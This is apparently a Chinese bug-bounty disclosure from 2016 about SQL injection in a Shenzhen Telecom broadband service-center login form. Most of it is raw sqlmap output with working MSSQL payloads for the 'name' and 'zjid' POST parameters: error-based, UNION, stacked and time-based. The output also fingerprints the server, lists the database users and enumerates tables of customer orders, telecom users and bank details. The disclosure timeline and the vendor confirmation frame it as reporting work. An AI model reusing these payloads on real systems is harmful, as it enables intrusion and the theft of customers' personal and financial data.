2016-04-03: 细节已通知厂商并且等待厂商处理中 2016-04-06: 厂商已经确认,细节仅向厂商公开 2016-04-16: 细节向核心白帽子及相关领域专家公开 2016-04-26: 细节向普通白帽子公开 2016-05-06: 细节向实习白帽子公开 2016-05-21: 细节向公众公开
大量敏感信息泄漏!~~~包括帐号、身份证、个人信息、银行信息、订单信息、企业信息等等!~~~
深圳市电信宽带受理中心多处注入注入点:
http://**.**.**.**/up/?login=yes (POST)name=111&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
name和zjid均存在注入
sqlmap identified the following injection points with a total of 155 HTTP(s) requests:---Place: POSTParameter: zjid Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: name=111&zjid=-1221' OR 8367=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8367=8367) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'BQDy'='BQDy&Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: UNION query Title: Generic UNION query (NULL) - 51 columns Payload: name=111&zjid=2222' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(66)+CHAR(70)+CHAR(112)+CHAR(72)+CHAR(120)+CHAR(104)+CHAR(89)+CHAR(90)+CHAR(71)+CHAR(88)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: name=111&zjid=2222'; WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: name=111&zjid=2222' WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AFPlace: POSTParameter: name Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: name=-6638' OR 3817=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3817=3817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'bWIg'='bWIg&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: UNION query Title: Generic UNION query (NULL) - 51 columns Payload: name=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(116)+CHAR(71)+CHAR(81)+CHAR(65)+CHAR(104)+CHAR(103)+CHAR(105)+CHAR(86)+CHAR(110)+CHAR(86)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: name=111'; WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: name=111' WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF---there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: name, type: Single quoted string (default)[1] place: POST, parameter: zjid, type: Single quoted string[q] Quit> 0[04:16:35] [INFO] testing Microsoft SQL Server[04:16:35] [INFO] confirming Microsoft SQL Server[04:16:38] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft SQL Server 2008[04:16:38] [INFO] fetching current usercurrent user: 'hds0270595'[04:16:39] [INFO] fetching current databasecurrent database: 'hds0270595_db'[04:16:40] [INFO] testing if current user is DBAcurrent user is DBA: Falsedatabase management system users [2]:[*] hds0270595[*] sa_hds027admavailable databases [3]:[*] hds0270595_db[*] master[*] tempdbDatabase: hds0270595_db+-------------------+---------+| Table | Entries |+-------------------+---------+| dbo.dingdan | 77035 | 订单| dbo.dxyonghu | 40942 | 电信用户| dbo.tvdingdan | 18960 | tv订单| dbo.xsdingdan | 15531 | 学生订单| dbo.dkjl | 13307 | 打款记录| dbo.quyu | 8813 | 区域| dbo.cdma | 7063 | cdma| dbo.tvyonghu | 5844 | tv用户| dbo.qydingdan | 1721 | 企业订单| dbo.zhangbu | 1080 | 账簿| dbo.zhdingdan | 1043 | ?订单| dbo.yybb | 1031 | | dbo.xydingdan | 943 | 信用订单?| dbo.rizi | 908 | 日子| dbo.bankmx | 771 | 银行明细| dbo.telbook | 605 | 电话簿| dbo.caigou | 210 | 采购| dbo.mingxi | 174 | 明细| dbo.dxtaocan | 128 | 电信套餐| dbo.wcdma | 87 | wcdma| dbo.taocan | 78 | 套餐| dbo.tvtaocan | 64 | tv套餐| dbo.yuangong | 48 | 员工| dbo.chanpin | 43 || dbo.dxwapchanping | 33 || dbo.dxwapchanping | 33 || dbo.caidan | 32 || dbo.tvdz | 21 | | dbo.tvwapchanping | 13 || dbo.tvwapchanping | 13 || dbo.modem | 10 || dbo.dls | 4 | 代理商?| dbo.ywqx | 4 | | dbo.zu_yuangong | 3 | 组员工?| dbo.config | 1 |+-------------------+---------+
如上
过滤修复
危害等级:高
漏洞Rank:10
确认时间:2016-04-06 14:05
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无
市电信?= =!
据说像我一样带前缀的,给的分会更高噢